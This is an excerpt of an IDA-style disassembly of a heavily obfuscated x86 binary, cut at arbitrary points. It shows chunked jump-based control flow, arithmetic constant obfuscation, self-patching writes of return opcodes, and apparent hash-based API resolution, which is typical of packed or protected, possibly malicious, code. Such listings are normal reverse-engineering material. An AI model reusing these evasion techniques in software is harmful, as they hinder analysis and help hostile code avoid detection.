; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_446ADC:				; CODE XREF: sub_43F8B8+351Fj
		jle	loc_44F7A1
; END OF FUNCTION CHUNK	FOR sub_43F8B8

; =============== S U B	R O U T	I N E =======================================



sub_446AE2	proc near		; CODE XREF: y2kk37jd:0043DC32p
		xchg	ecx, [esp+0]
		pop	ecx
		pop	edx
		jmp	loc_4421AD
sub_446AE2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_446AEC:				; CODE XREF: y2kk37jd:loc_445103j
					; y2kk37jd:0044CF51j
		call	sub_454C73
		push	eax
		mov	eax, ecx
		xchg	eax, [esp]
		mov	ecx, [esp+10h]
		mov	dword ptr [ecx], 10001h
		lea	eax, sub_44F7EA
		jmp	loc_447358
; ---------------------------------------------------------------------------

loc_446B0C:				; CODE XREF: y2kk37jd:004404E8j
		add	eax, 7D0h
		jmp	loc_450107
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_446B16:				; CODE XREF: sub_454D0F-10A36j
		push	0DEFCB340h
		xchg	edi, [esp+4+var_4]
		mov	esi, edi
		pop	edi
		xor	esi, 0B1E770E5h
		and	esi, 29D37BDCh
		xor	esi, 949A0EABh
		test	esi, 20000h
		jmp	loc_43E509
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F0C

loc_446B3E:				; CODE XREF: sub_440F0C+16j
		test	esi, 8
		jmp	loc_452335
; END OF FUNCTION CHUNK	FOR sub_440F0C
; ---------------------------------------------------------------------------

loc_446B49:				; CODE XREF: y2kk37jd:00459F81j
		push	ebx
		push	9C666759h
		pop	ebx
		sub	ebx, 0C2762224h
		or	ebx, 0B65BAC40h
		test	ebx, 400000h
; START	OF FUNCTION CHUNK FOR sub_445226

loc_446B62:				; CODE XREF: sub_445226+1BEj
		jmp	loc_441B28
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B55D

loc_446B67:				; CODE XREF: sub_44B55D:loc_440C7Fj
		sbb	edi, ebp
		jmp	loc_4550F7
; END OF FUNCTION CHUNK	FOR sub_44B55D

; =============== S U B	R O U T	I N E =======================================



sub_446B6E	proc near		; CODE XREF: sub_446B6E:loc_43F1FCj
					; y2kk37jd:00441B82j ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F1FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440882 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B87 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00445D46 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044EED6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045028B SIZE 00000028 BYTES

		pop	edx
		jns	loc_441B87
		mov	eax, [esp+0]
		push	eax
		jmp	loc_44EED6
sub_446B6E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_446B7E:				; CODE XREF: y2kk37jd:0045B187j
		jnz	sub_450203

loc_446B84:				; CODE XREF: y2kk37jd:loc_449CD5j
		push	eax
		lea	eax, sub_446EA8
		push	offset sub_4566DF
		jmp	locret_453431
; ---------------------------------------------------------------------------
		db 1Fh,	64h, 86h
dword_446B98	dd 0			; DATA XREF: sub_44D6A5:loc_44935Ew
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458CA

loc_446B9C:				; CODE XREF: sub_4458CA+Ej
		jmp	loc_455AB5
; END OF FUNCTION CHUNK	FOR sub_4458CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442002

loc_446BA1:				; CODE XREF: sub_442002+14j
		jmp	nullsub_48
; END OF FUNCTION CHUNK	FOR sub_442002
; ---------------------------------------------------------------------------
		dw 6962h
dword_446BA8	dd 0			; DATA XREF: y2kk37jd:0043C136w
dword_446BAC	dd 0			; DATA XREF: sub_43DBDD+4w
					; sub_454539:loc_441DC1r ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_446BB0:				; CODE XREF: sub_4507BF+4089j
		jmp	loc_448DD5
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_446BB5:				; CODE XREF: sub_445226+95DDj
		jmp	loc_443DF3
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_446BBA:				; CODE XREF: y2kk37jd:00449485j
		jmp	loc_45AD47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_446BBF:				; CODE XREF: sub_449DFE-2CC3j
		jmp	loc_44E7C3
; END OF FUNCTION CHUNK	FOR sub_449DFE
; ---------------------------------------------------------------------------
dword_446BC4	dd 0			; DATA XREF: sub_4507BF-F9D3w
					; sub_45C6ED-46FEr
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_446BC8:				; CODE XREF: sub_43ED86+14j
		jmp	loc_45079C
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
		db 9Bh,	51h, 5Fh
dword_446BD0	dd 986951DFh		; DATA XREF: y2kk37jd:00443ADAw
					; sub_447D0B+1000Ar ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A36

loc_446BD4:				; CODE XREF: sub_456A36-4FB0j
		jmp	loc_4467AE
; END OF FUNCTION CHUNK	FOR sub_456A36
; ---------------------------------------------------------------------------
		db 0C8h, 0B6h, 0D2h
dword_446BDC	dd 0D6EEFCEh		; DATA XREF: y2kk37jd:loc_44395Dr
					; y2kk37jd:00455AF5w
; ---------------------------------------------------------------------------

loc_446BE0:				; CODE XREF: y2kk37jd:loc_45A040j
		jnz	loc_45A80A
		jmp	loc_44D927
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_446BEB:				; CODE XREF: sub_43C851:loc_44B12Bj
		pop	ebp
		pop	eax
		mov	eax, ds:dword_447334
		or	eax, eax
		jnz	loc_457017
		jmp	loc_44C42A
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------

loc_446C00:				; CODE XREF: y2kk37jd:0044B308j
		jns	loc_4508E7
		xor	ebx, 0AE2730EFh
		jz	loc_45755E
; START	OF FUNCTION CHUNK FOR sub_445787

loc_446C12:				; CODE XREF: sub_445787-722Fj
		add	esi, 46823534h
		jmp	loc_44D2B8
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
		jl	loc_446C82
		jmp	sub_458FCE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432FD

loc_446C28:				; CODE XREF: sub_4432FD:loc_440359j
		jz	loc_44D501
		jmp	loc_451431
; END OF FUNCTION CHUNK	FOR sub_4432FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_446C33:				; CODE XREF: sub_440337:loc_457D3Dj
		jb	loc_44F264
		mov	ecx, [eax]
		jmp	loc_452567
; END OF FUNCTION CHUNK	FOR sub_440337

; =============== S U B	R O U T	I N E =======================================



sub_446C40	proc near		; DATA XREF: y2kk37jd:00451C44o

; FUNCTION CHUNK AT 0044B109 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B850 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00454802 SIZE 00000008 BYTES

		or	eax, eax
		jnz	loc_45480A
		jmp	loc_44B109
sub_446C40	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_446C4D:				; CODE XREF: y2kk37jd:loc_45269Bj
		retn

; =============== S U B	R O U T	I N E =======================================



sub_446C4E	proc near		; CODE XREF: sub_445226+1372Ej

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00448C1B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448D9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C801 SIZE 00000017 BYTES

		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp+4+var_4]
		push	53B3BC68h
		pop	edi
		add	edi, 0A2B4A69Bh
		jmp	loc_448D9C
sub_446C4E	endp

; ---------------------------------------------------------------------------
		jmp	ds:off_41E0AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E63A

loc_446C6B:				; CODE XREF: sub_44E63A-D7BEj
					; sub_44704D:loc_44AC52j ...
		jz	loc_43D227
		pop	edx
		push	offset loc_458DA4
		jmp	nullsub_85
; END OF FUNCTION CHUNK	FOR sub_44E63A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459789

loc_446C7C:				; CODE XREF: sub_459789-9B11j
		jnz	loc_451ADD

loc_446C82:				; CODE XREF: y2kk37jd:00446C1Dj
		jmp	loc_45BF04
; END OF FUNCTION CHUNK	FOR sub_459789
; ---------------------------------------------------------------------------
		mov	ds:off_41E204, eax
		lea	eax, loc_45854F
		mov	byte ptr [eax],	0C3h
		jmp	loc_44D53B

; =============== S U B	R O U T	I N E =======================================



sub_446C9B	proc near		; CODE XREF: sub_4198C0+4Ap
					; sub_446C9B+5j
					; DATA XREF: ...
		call	sub_4477F9
		jmp	ds:off_41E208
sub_446C9B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448526

loc_446CA6:				; CODE XREF: sub_448526+Ej
		jmp	loc_447108
; END OF FUNCTION CHUNK	FOR sub_448526
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AC4B

loc_446CAB:				; CODE XREF: sub_45AC4B-1683Dj
		jmp	nullsub_351
; END OF FUNCTION CHUNK	FOR sub_45AC4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455E6A

loc_446CB0:				; CODE XREF: sub_455E6A:loc_455717j
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		mov	[ebp-4], eax
		push	offset loc_45A362
		jmp	nullsub_174
; END OF FUNCTION CHUNK	FOR sub_455E6A

; =============== S U B	R O U T	I N E =======================================



sub_446CC2	proc near		; CODE XREF: y2kk37jd:0044A110p
					; y2kk37jd:00452DB2j

; FUNCTION CHUNK AT 00442884 SIZE 0000000A BYTES

		xchg	eax, [esp+0]

loc_446CC5:				; CODE XREF: y2kk37jd:00453D88j
		pop	eax
		push	0B3B1CE81h
		pop	eax
		xor	eax, 1603769Fh
		jmp	loc_442884
sub_446CC2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 0D372DA5Dh
		call	sub_442C3E
		mov	ds:off_41E184, eax
		lea	eax, loc_447C6F
		mov	byte ptr [eax],	0C3h
		jmp	loc_447C6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D412

loc_446CF5:				; CODE XREF: sub_43D412:loc_447C6Fj
		pop	edx
		jmp	loc_45BA4B
; END OF FUNCTION CHUNK	FOR sub_43D412
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_446CFB:				; CODE XREF: sub_445226:loc_4432C7j
		jnz	loc_44A201
		jmp	loc_43C0DE
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA5B

loc_446D06:				; CODE XREF: sub_43CA5B:loc_45540Ej
		pop	ebp
		add	eax, 7708EA76h
		or	eax, 9BE8772Ch
		add	eax, 5AD33Ah

loc_446D19:				; CODE XREF: sub_45B7AA-18277j
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_43C7AF
		jmp	loc_4489D6
; END OF FUNCTION CHUNK	FOR sub_43CA5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_446D28:				; CODE XREF: sub_44DED9:loc_44EBAEj
		jz	loc_443933
		jmp	loc_44DA28
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------

loc_446D33:				; CODE XREF: y2kk37jd:loc_459EB6j
		jnz	loc_459B1B
		jmp	loc_456CCE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EAB

loc_446D3E:				; CODE XREF: sub_443EAB:loc_443EB6j
		push	3FDDFAA1h
		pop	ecx
		or	ecx, 0BB198C39h
		add	ecx, 0F07944F2h
		xor	ecx, 0B9934693h
		add	ecx, ebp
		jmp	loc_457959
; END OF FUNCTION CHUNK	FOR sub_443EAB
; ---------------------------------------------------------------------------

locret_446D5D:				; CODE XREF: y2kk37jd:loc_44AFD3j
		retn
; ---------------------------------------------------------------------------

loc_446D5E:				; CODE XREF: y2kk37jd:0044B5E4j
		jmp	loc_44BC5E
; ---------------------------------------------------------------------------

loc_446D63:				; CODE XREF: y2kk37jd:00448CDBj
		jmp	loc_451744
; ---------------------------------------------------------------------------
		cmp	ecx, ebp
		jmp	loc_44F951
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_446D6F:				; CODE XREF: sub_445226+243j
		jz	loc_44F188
		jmp	loc_443CEA
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_446D7A:				; CODE XREF: sub_4492F7+4j
		cmp	dword ptr [ebp-1Ch], 66h
		jnz	loc_452875
		mov	eax, 6
		sub	eax, [ebp-0Ch]
		mov	[ebp-0Ch], eax

loc_446D8F:				; CODE XREF: sub_4492F7-4508j
					; sub_4492F7:loc_444E7Ej ...
		mov	eax, [ebp-20h]
		jmp	loc_440E91
; END OF FUNCTION CHUNK	FOR sub_4492F7
; ---------------------------------------------------------------------------

loc_446D97:				; CODE XREF: y2kk37jd:004512D9j
		jb	loc_449EBA
		pop	edx
		or	edi, eax
		jmp	loc_450EB0
; ---------------------------------------------------------------------------
		mov	eax, 5BE2C7B9h
		call	sub_442C3E
		push	edx
		push	0E96F2B9Eh
		jmp	loc_44B503
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C054

loc_446DBA:				; CODE XREF: sub_43C054+14E32j
		mov	ds:dword_446628, eax
		cmp	ds:dword_446628, 0
		jmp	loc_44550D
; END OF FUNCTION CHUNK	FOR sub_43C054
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447977

loc_446DCB:				; CODE XREF: sub_447977j
		call	sub_44723A

loc_446DD0:				; CODE XREF: sub_448700:loc_4460AAj
		add	ebx, ebp
		add	ebx, 0CD5D37A5h
		mov	ebx, [ebx]
		cmp	eax, ebx
		pop	ebx
		jbe	loc_43CC4C
		jmp	loc_4523AD
; END OF FUNCTION CHUNK	FOR sub_447977
; ---------------------------------------------------------------------------
		or	ebx, eax
		jmp	loc_44EF0B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_371. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_446DF0:				; CODE XREF: y2kk37jd:0043D97Ej
		jmp	loc_452670
; ---------------------------------------------------------------------------

loc_446DF5:				; CODE XREF: y2kk37jd:00454DF5j
		adc	ebp, 0AFAB8E92h

; =============== S U B	R O U T	I N E =======================================



sub_446DFB	proc near		; CODE XREF: sub_45689F+6p

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	edx, [esp-4+arg_0]
		jmp	sub_442C3E
sub_446DFB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4425BE

loc_446E07:				; CODE XREF: sub_4425BE+Bj
		setz	al
		call	sub_45024B
		push	offset loc_43FFCB
		jmp	nullsub_370
; END OF FUNCTION CHUNK	FOR sub_4425BE

; =============== S U B	R O U T	I N E =======================================



sub_446E19	proc near		; DATA XREF: y2kk37jd:0044A24Fo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D19C SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00440173 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00441A0D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443E14 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00447605 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00447BFC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004500C3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453459 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455A33 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B297 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045BAEB SIZE 00000005 BYTES

		add	esi, ebp
		add	esi, 0D2C5F782h
		mov	[esi], eax
		pop	esi
		xor	eax, eax
		push	esi
		push	43FE8846h
		jmp	loc_447605
sub_446E19	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_446E31:				; DATA XREF: sub_43DE8B:loc_45A31Ao
		push	ecx
		push	0EE6D5D3Eh
		pop	ecx
		add	ecx, 148FE6D4h

loc_446E3E:				; CODE XREF: y2kk37jd:loc_43F68Ej
		jmp	loc_45C3E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_446E43:				; CODE XREF: sub_453867:loc_443F80j
		mov	eax, edi
		pop	edi
		and	eax, ds:4000E8h
		sub	eax, 6EBF01F7h
		rol	eax, 10h
		and	eax, 0E784D1A1h
		add	eax, 0D127CE10h
		add	eax, ebp
		jmp	loc_441B5A
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_446E68:				; CODE XREF: y2kk37jd:00456DBEj
		jns	loc_453C04
		and	edx, eax
		pop	ecx
		jmp	loc_4523D9
; ---------------------------------------------------------------------------

loc_446E76:				; CODE XREF: y2kk37jd:00454F6Dj
		mov	ebx, edi
		jmp	loc_4457A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E9

loc_446E7D:				; CODE XREF: sub_4554E9-CFF7j
		xor	ebx, 0A10E617h
		sub	eax, ebx
		pop	ebx
		rol	eax, 5
		not	ebx
		jmp	loc_44221A
; END OF FUNCTION CHUNK	FOR sub_4554E9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_347. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_446E91:				; CODE XREF: sub_44001E+B901j
		jmp	nullsub_283
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
		dw 0FCD5h
dword_446E98	dd 0			; DATA XREF: sub_4488AC+4EB1w
					; y2kk37jd:loc_4566EDr	...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440FDF

loc_446E9C:				; CODE XREF: sub_440FDF+D95Aj
		jmp	loc_4543D1
; END OF FUNCTION CHUNK	FOR sub_440FDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EAA2

loc_446EA1:				; CODE XREF: sub_44EAA2-128F4j
		jmp	nullsub_475
; END OF FUNCTION CHUNK	FOR sub_44EAA2
; ---------------------------------------------------------------------------
		dw 7A8Dh

; =============== S U B	R O U T	I N E =======================================



sub_446EA8	proc near		; DATA XREF: y2kk37jd:00446B85o
					; sub_455D37+5o

; FUNCTION CHUNK AT 0043D87C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452175 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045980C SIZE 00000013 BYTES

		push	ebx
		mov	al, ds:0D823C594h
		fadd	dword ptr [eax]
		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		jmp	loc_43D87C
sub_446EA8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_446EBA:				; CODE XREF: sub_43ED19+3810j
		jns	loc_448787

loc_446EC0:				; CODE XREF: sub_45C104-139A5j
		popf
		jmp	loc_44F598
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================



sub_446EC6	proc near		; CODE XREF: sub_4514DE-9A90j
		push	ebx
		not	edx
sub_446EC6	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_446EC9:				; CODE XREF: sub_4514DE:loc_444DB8j
		push	0BD52A88h
		pop	eax
		sub	eax, 7DE33F0Ch
		jmp	loc_4489E1
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_446EDA:				; CODE XREF: sub_45689F:loc_45BACFj
		push	edx
		call	sub_43C326
		mov	eax, 934299CDh
		call	sub_442C3E
		jmp	loc_444F8E
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_457233
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_446EF5:				; CODE XREF: sub_45689F:loc_444F8Ej
		mov	ds:dword_41E0F0, eax
		lea	eax, nullsub_35
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_35
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_446F09:				; CODE XREF: y2kk37jd:0045A68Cj
		mov	eax, [esp]
		push	edx
		push	offset loc_43D371
		jmp	locret_443C47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_446F17:				; CODE XREF: sub_43EF4F+1CB76j
		test	eax, 1B0E5A70h
		jmp	loc_452A54
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------

loc_446F22:				; CODE XREF: y2kk37jd:loc_43FD87j
		or	eax, 0C0E5BBA7h
		test	eax, 80000000h
		jmp	loc_456369
; ---------------------------------------------------------------------------

loc_446F33:				; DATA XREF: sub_44DAE1:loc_441864o
		push	esi
		mov	esi, ebp
		xchg	esi, [esp]
		mov	ebp, esp
		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp]
		mov	byte ptr [ebp-1], 0
		jmp	loc_45936D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_116. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AA4A

loc_446F4B:				; CODE XREF: sub_44AA4A:loc_44AA5Fj
		jmp	loc_45830D
; END OF FUNCTION CHUNK	FOR sub_44AA4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_446F50:				; CODE XREF: sub_445226-2493j
		jmp	loc_45B749
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DE9F

loc_446F55:				; CODE XREF: sub_44DE9F:loc_444E2Dj
		push	3F1EF323h
		pop	edi
		or	edi, 5EC89C4Fh
		sub	edi, 0BD6E2FA3h
		add	edi, 0DBCBA791h
		test	edi, 80000000h
		jmp	loc_4450A8
; END OF FUNCTION CHUNK	FOR sub_44DE9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_446F78:				; CODE XREF: sub_4447EA-239Aj
		push	edi
		mov	edi, edx
		xchg	edi, [esp+4+var_4]
		push	edi
		push	0C0B4D2C4h
		pop	edi
		jmp	loc_45038F
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_446F8A:				; CODE XREF: sub_454D0F:loc_4572DBj
		pop	esi
		jnz	loc_445830
		ror	eax, 1Fh
		xor	eax, 787C63C5h
		mov	edx, [esp-4+arg_0]
		push	eax
		mov	eax, edx
		call	sub_43F618
		jmp	loc_43DF07
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_446FAA:				; CODE XREF: sub_453583:loc_44D05Fj
		rol	edi, 1Fh
		add	edi, 0EF89AA40h
		xor	edi, 0C9B97555h
		add	edi, 19CA956Dh
		jmp	loc_44ACC1
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD49

loc_446FC4:				; CODE XREF: sub_43BD49+1E5EEj
		adc	esi, 72891615h
		mov	ebp, 0FFF1FB3Bh

loc_446FCF:				; CODE XREF: sub_43BD49:loc_45A63Ej
		call	sub_44DAE1
		push	offset loc_455BAD
		jmp	loc_453D60
; END OF FUNCTION CHUNK	FOR sub_43BD49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451964

loc_446FDE:				; CODE XREF: sub_451964:loc_43B893j
		rol	edx, 1
		test	edx, 1000000h
		jmp	loc_44E813
; END OF FUNCTION CHUNK	FOR sub_451964

; =============== S U B	R O U T	I N E =======================================



sub_446FEB	proc near		; CODE XREF: y2kk37jd:00444C65j
					; sub_43E049+9C7Dp

; FUNCTION CHUNK AT 00459E0F SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	byte ptr [eax],	0C3h
		jmp	loc_459E0F
sub_446FEB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_446FF7	proc near		; CODE XREF: sub_4191D2+31Ep
					; y2kk37jd:00443D2Cj
					; DATA XREF: ...
		push	edi
		call	sub_43DF8A

loc_446FFD:				; CODE XREF: sub_4458DD:loc_455907j
		jmp	loc_45B7F0
sub_446FF7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_447002:				; CODE XREF: sub_4411C3-5269j
		jnz	loc_4579E2
		jmp	loc_4527C6
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================



sub_44700D	proc near		; CODE XREF: sub_44C500p
					; y2kk37jd:0045B544j
		xchg	eax, [esp+0]
		pop	eax
		push	ebp
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		jmp	loc_4454C8
sub_44700D	endp

; ---------------------------------------------------------------------------
		test	eax, esi
		jmp	loc_4571A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_447027:				; CODE XREF: sub_4448E2:loc_43F1F7j
		jl	loc_44DF46
		and	ebp, eax
		jmp	loc_44DF40
; END OF FUNCTION CHUNK	FOR sub_4448E2

; =============== S U B	R O U T	I N E =======================================



sub_447034	proc near		; DATA XREF: sub_445226:loc_45ADE2o

arg_0		= dword	ptr  4

		pop	ecx
		xchg	edi, [esp-4+arg_0]
		mov	ebp, edi
		pop	edi
		retn
sub_447034	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44703C:				; CODE XREF: y2kk37jd:00456D6Fj
		jmp	loc_451BF4

; =============== S U B	R O U T	I N E =======================================



sub_447041	proc near		; CODE XREF: y2kk37jd:004412DEp
					; sub_442ED1+7p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F76E SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044A1E9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044C122 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D2A8 SIZE 00000005 BYTES

		push	edx
		sub	edx, 87CDF396h
		jmp	loc_44A1E9
sub_447041	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44704D	proc near		; CODE XREF: y2kk37jd:004500BEj
					; sub_4585C4+6p

; FUNCTION CHUNK AT 0043B1C2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00440F9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AC3E SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044F064 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454237 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00456483 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00459FF4 SIZE 00000007 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		jmp	loc_43B1C2
sub_44704D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		pop	esi
		jmp	sub_45833C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A783

loc_447062:				; CODE XREF: sub_45A783+Ej
		push	91D54ADBh
		or	edx, ebp
		jmp	loc_44495B
; END OF FUNCTION CHUNK	FOR sub_45A783
; ---------------------------------------------------------------------------

loc_44706E:				; CODE XREF: y2kk37jd:00455162j
		jns	loc_44A1BB
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_447074:				; CODE XREF: sub_4480CB-CD8Dj
					; y2kk37jd:004468EEj
		jmp	loc_44D694
; END OF FUNCTION CHUNK	FOR sub_4480CB
; ---------------------------------------------------------------------------
		cmp	edx, ebx
		jmp	loc_45972F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D2FC

loc_447080:				; CODE XREF: sub_43D2FC:loc_4416B5j
					; sub_43D2FC+43CBj
		xor	esi, 0C61718CEh
		and	esi, 51E53CF9h
		add	esi, 0EE64211Fh
; END OF FUNCTION CHUNK	FOR sub_43D2FC
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_447092:				; CODE XREF: sub_4448E2:loc_43C658j
		xchg	esi, [esp+0]
		jmp	loc_43DB61
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		sbb	esi, ebp
		jmp	sub_44426A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_4470A1:				; CODE XREF: sub_43B765+17577j
		jnz	loc_4533E7
		jmp	loc_44C917
; END OF FUNCTION CHUNK	FOR sub_43B765
; ---------------------------------------------------------------------------
